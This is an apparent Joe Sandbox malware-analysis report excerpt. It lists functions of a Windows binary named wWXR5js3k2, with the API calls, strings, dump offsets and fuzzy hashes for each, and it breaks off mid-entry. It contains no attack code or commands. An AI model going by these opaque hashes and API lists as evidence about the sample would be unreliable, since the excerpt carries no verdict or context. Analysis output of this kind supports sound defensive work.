                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                    • String ID: @U=u
                                                    • API String ID: 2819616528-2594219639
                                                    • Opcode ID: fba1ae4dea4ec88e87108a46f6c4202ef75fd86ba96d0e923313bc67beeb5213
                                                    • Instruction ID: 26ccd7fb61f31ff4322f7bc55bcbab2abff8935642f531a047494427477d6f60
                                                    • Opcode Fuzzy Hash: fba1ae4dea4ec88e87108a46f6c4202ef75fd86ba96d0e923313bc67beeb5213
                                                    • Instruction Fuzzy Hash: BC516C70A00606EFDB24EF64CC55FAA37B6EB59321F108629F902972E0D770ED95DB60
                                                    Function 00659837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __i64tow__itow__swprintf
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 421087845-2263619337
                                                    • Opcode ID: c304965f6dae2cce37b4619535ed2fbabfb8606fa1e77781c9cb94acc87e9432
                                                    • Instruction ID: d35d58d9be61da5c2ddf401633ac90b382ca358b2c519bda8d6e560f86320dac
                                                    • Opcode Fuzzy Hash: c304965f6dae2cce37b4619535ed2fbabfb8606fa1e77781c9cb94acc87e9432
                                                    • Instruction Fuzzy Hash: AA41E671510205EEEB64EF74D842ABA73EBEF05300F24497EE949D7391EA319946CB21
                                                    Function 006A8F8F Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006A9014
                                                    • GetDlgCtrlID.USER32 ref: 006A901F
                                                    • GetParent.USER32 ref: 006A903B
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 006A903E
                                                    • GetDlgCtrlID.USER32(?), ref: 006A9047
                                                    • GetParent.USER32(?), ref: 006A9063
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 006A9066
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: @U=u$ComboBox$ListBox
                                                    • API String ID: 1536045017-2258501812
                                                    • Opcode ID: 182c5e5963f7e99ac5e7d386f543cf1986aa25d569ad27453cb4a44c262a7b59
                                                    • Instruction ID: fd3ad06f54599cb17272682349528a787aab85e4050427844edd158437dd0641
                                                    • Opcode Fuzzy Hash: 182c5e5963f7e99ac5e7d386f543cf1986aa25d569ad27453cb4a44c262a7b59
                                                    • Instruction Fuzzy Hash: B121C770E00148BFDF04ABA0CC85EFEB7B6EF4A310F10411AB952572E1DB759819DA20
                                                    Function 006A907A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006A90FD
                                                    • GetDlgCtrlID.USER32 ref: 006A9108
                                                    • GetParent.USER32 ref: 006A9124
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 006A9127
                                                    • GetDlgCtrlID.USER32(?), ref: 006A9130
                                                    • GetParent.USER32(?), ref: 006A914C
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 006A914F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: @U=u$ComboBox$ListBox
                                                    • API String ID: 1536045017-2258501812
                                                    • Opcode ID: 803b4bee1e806b3cef0b5c907276891c22d60558cc58a95202585af412fad9e9
                                                    • Instruction ID: e409e88a29b71acac477d525fc8e730020a492ea0c50c0b3c66d26e8c232c41a
                                                    • Opcode Fuzzy Hash: 803b4bee1e806b3cef0b5c907276891c22d60558cc58a95202585af412fad9e9
                                                    • Instruction Fuzzy Hash: 0121CB74E00149BBDF05ABA4CC85EFDB7B6EF46300F10411AB911972E1DB759919DF20
                                                    Function 006A9163 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 72windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32 ref: 006A916F
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 006A9184
                                                    • _wcscmp.LIBCMT ref: 006A9196
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006A9211
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                    • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1704125052-1428604138
                                                    • Opcode ID: ec7d8cc00928cf8830fb611212f674dd852b2dff12310012736b8f8d14f31403
                                                    • Instruction ID: f40549907d749d8b664008abd4a8862f487c85fb098b72fd5e0b24211d1d800e
                                                    • Opcode Fuzzy Hash: ec7d8cc00928cf8830fb611212f674dd852b2dff12310012736b8f8d14f31403
                                                    • Instruction Fuzzy Hash: F3113676658307BAFB143624EC1AEE737DE9B07320B30012AF904E45D2FE627D529DA4
                                                    Function 00676E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00676E3E
                                                      • Part of subcall function 00678B28: __getptd_noexit.LIBCMT ref: 00678B28
                                                    • __gmtime64_s.LIBCMT ref: 00676ED7
                                                    • __gmtime64_s.LIBCMT ref: 00676F0D
                                                    • __gmtime64_s.LIBCMT ref: 00676F2A
                                                    • __allrem.LIBCMT ref: 00676F80
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00676F9C
                                                    • __allrem.LIBCMT ref: 00676FB3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00676FD1
                                                    • __allrem.LIBCMT ref: 00676FE8
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00677006
                                                    • __invoke_watson.LIBCMT ref: 00677077
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                    • Instruction ID: 1e3a3044bfbc4e08fcdb439a58d242e037666d20e19a8910a6941fb33e58dd52
                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                    • Instruction Fuzzy Hash: 7C71E4B6A00B17ABD714EE78DC41B9AB3AAAF04724F14C22DF518E7381E770DD408794
                                                    Function 006B2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B2542
                                                    • GetMenuItemInfoW.USER32(00715890,000000FF,00000000,00000030), ref: 006B25A3
                                                    • SetMenuItemInfoW.USER32(00715890,00000004,00000000,00000030), ref: 006B25D9
                                                    • Sleep.KERNEL32(000001F4), ref: 006B25EB
                                                    • GetMenuItemCount.USER32(?), ref: 006B262F
                                                    • GetMenuItemID.USER32(?,00000000), ref: 006B264B
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 006B2675
                                                    • GetMenuItemID.USER32(?,?), ref: 006B26BA
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006B2700
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B2714
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B2735
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: 58d6902cc0ce0a6a66e34559383e1eb9f1de44b57a1114d7673b7756fe3b1c68
                                                    • Instruction ID: 72033b7e5ec2adc9bc3864a76767e1d8926aafe1ffb593efdaa2e8b2f131d0a3
                                                    • Opcode Fuzzy Hash: 58d6902cc0ce0a6a66e34559383e1eb9f1de44b57a1114d7673b7756fe3b1c68
                                                    • Instruction Fuzzy Hash: 8D61A0F090024AAFDB21CF64DCA8DEE7BFAFB45304F144469E842A3251DB31AD85CB25
                                                    Function 006A6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006A6BBF
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 006A6C18
                                                    • VariantInit.OLEAUT32(?), ref: 006A6C2A
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 006A6C4A
                                                    • VariantCopy.OLEAUT32(?,?), ref: 006A6C9D
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 006A6CB1
                                                    • VariantClear.OLEAUT32(?), ref: 006A6CC6
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 006A6CD3
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006A6CDC
                                                    • VariantClear.OLEAUT32(?), ref: 006A6CEE
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006A6CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 8dacfc17b3130875358651ed107a870bd37d1c46fd922a49b6263be80dd29321
                                                    • Instruction ID: 767994fd5410456fae68324d8605eb655e928f0b946248b83d01e4a6b4b22892
                                                    • Opcode Fuzzy Hash: 8dacfc17b3130875358651ed107a870bd37d1c46fd922a49b6263be80dd29321
                                                    • Instruction Fuzzy Hash: 13414F75E002199FCB00EF64D8449AEBBBAEF09354F048069F956E7261CB31AD45CFA0
                                                    Function 006DB351 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 199windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(00E15768), ref: 006DB3EB
                                                    • IsWindowEnabled.USER32(00E15768), ref: 006DB3F7
                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 006DB4DB
                                                    • SendMessageW.USER32(00E15768,000000B0,?,?), ref: 006DB512
                                                    • IsDlgButtonChecked.USER32(?,?), ref: 006DB54F
                                                    • GetWindowLongW.USER32(00E15768,000000EC), ref: 006DB571
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006DB589
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID: @U=u$hW
                                                    • API String ID: 4072528602-4076565667
                                                    • Opcode ID: b42307b61e873feb5964af6cfb08d10c3680efa53bee4e68f5b22647788ad64f
                                                    • Instruction ID: 9565937fc1a37c3af200b5d7cdc08e70b921ce3690ad4f95f3e941be60a7b94c
                                                    • Opcode Fuzzy Hash: b42307b61e873feb5964af6cfb08d10c3680efa53bee4e68f5b22647788ad64f
                                                    • Instruction Fuzzy Hash: 1771AD34A01204EFDB25DF54C894FFA7BF6EF49300F16A06AE942973AAC731A941DB54
                                                    Function 00652E26 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 186windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00652EAE
                                                      • Part of subcall function 00651DB3: GetClientRect.USER32(?,?), ref: 00651DDC
                                                      • Part of subcall function 00651DB3: GetWindowRect.USER32(?,?), ref: 00651E1D
                                                      • Part of subcall function 00651DB3: ScreenToClient.USER32(?,?), ref: 00651E45
                                                    • GetDC.USER32 ref: 0068CD32
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0068CD45
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0068CD53
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0068CD68
                                                    • ReleaseDC.USER32(?,00000000), ref: 0068CD70
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0068CDFB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: @U=u$U
                                                    • API String ID: 4009187628-4110099822
                                                    • Opcode ID: 8f64795aa72e92ab3b22ae14ffbc05334e6e3b680d4a575353b31e1204943019
                                                    • Instruction ID: 5e20fd9416291f808741e1761e04f51798990027914f39b8d815c786a78fead2
                                                    • Opcode Fuzzy Hash: 8f64795aa72e92ab3b22ae14ffbc05334e6e3b680d4a575353b31e1204943019
                                                    • Instruction Fuzzy Hash: 2B71CF31800206DFCF25AF64C895AEA7BB7FF49321F14836AED555A2A6C7318C85DB60
                                                    Function 006C5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 006C5793
                                                    • inet_addr.WSOCK32(?,?,?), ref: 006C57D8
                                                    • gethostbyname.WSOCK32(?), ref: 006C57E4
                                                    • IcmpCreateFile.IPHLPAPI ref: 006C57F2
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006C5862
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006C5878
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006C58ED
                                                    • WSACleanup.WSOCK32 ref: 006C58F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: eb83ffec4a52931f0879c3713bf1a67b345ddc653eac3aac2baadab408d7dbe8
                                                    • Instruction ID: 14bda74fa883a0742ad2f97033c08bf33fa1efd1cddecde6763e34cfd718cfcf
                                                    • Opcode Fuzzy Hash: eb83ffec4a52931f0879c3713bf1a67b345ddc653eac3aac2baadab408d7dbe8
                                                    • Instruction Fuzzy Hash: E8517A316016109FDB10AF24DC49F6AB7E6EB48720F04896EF997DB2A1DB70E8448B56
                                                    Function 006D62CD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 99windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006D62EC
                                                    • GetWindowLongW.USER32(00E15768,000000F0), ref: 006D631F
                                                    • GetWindowLongW.USER32(00E15768,000000F0), ref: 006D6354
                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 006D6386
                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006D63B0
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 006D63C1
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006D63DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID: @U=u$hW
                                                    • API String ID: 2178440468-4076565667
                                                    • Opcode ID: a4b0d6e4ffd8051e53f129f1895e06dd620d600a2796b715448fbb4783f2551a
                                                    • Instruction ID: 701ac65bd2af7bf7271387ea52d6cb1ab3d1b072fca6a1f70ae19252c6f615b3
                                                    • Opcode Fuzzy Hash: a4b0d6e4ffd8051e53f129f1895e06dd620d600a2796b715448fbb4783f2551a
                                                    • Instruction Fuzzy Hash: 6B31E030A44290EFDB20CF59DC84F9537E2BB4A714F1A91AAF5019B3B2CB71A840DB51
                                                    Function 006BB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 006BB4D0
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006BB546
                                                    • GetLastError.KERNEL32 ref: 006BB550
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 006BB5BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: 1c595e5ebd49dd836630c7fe5610cb3789a87e5b156c14f907dbe8ca756d90a4
                                                    • Instruction ID: c3f33fcbc456d42aa7cde0b228d408cccf7f6041b36009c291ad63f5dd4bf45b
                                                    • Opcode Fuzzy Hash: 1c595e5ebd49dd836630c7fe5610cb3789a87e5b156c14f907dbe8ca756d90a4
                                                    • Instruction Fuzzy Hash: 673194B6A00205DFCB60EF68CC45EED77B6FF04311F14416AF90597291DBB19A86CB52
                                                    Function 006D61D3 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 006D61EB
                                                    • GetDC.USER32(00000000), ref: 006D61F3
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006D61FE
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 006D620A
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006D6246
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006D6257
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006D902A,?,?,000000FF,00000000,?,000000FF,?), ref: 006D6291
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006D62B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID: @U=u
                                                    • API String ID: 3864802216-2594219639
                                                    • Opcode ID: 9e616e125c8572ee09ee39e436d8a9a7de7234542e6b6a4da0c97275d9b4071f
                                                    • Instruction ID: 160e7216f55a4b11bdf0a5b8cfa34f6642fb1e6888278081ce4da9b20240098d
                                                    • Opcode Fuzzy Hash: 9e616e125c8572ee09ee39e436d8a9a7de7234542e6b6a4da0c97275d9b4071f
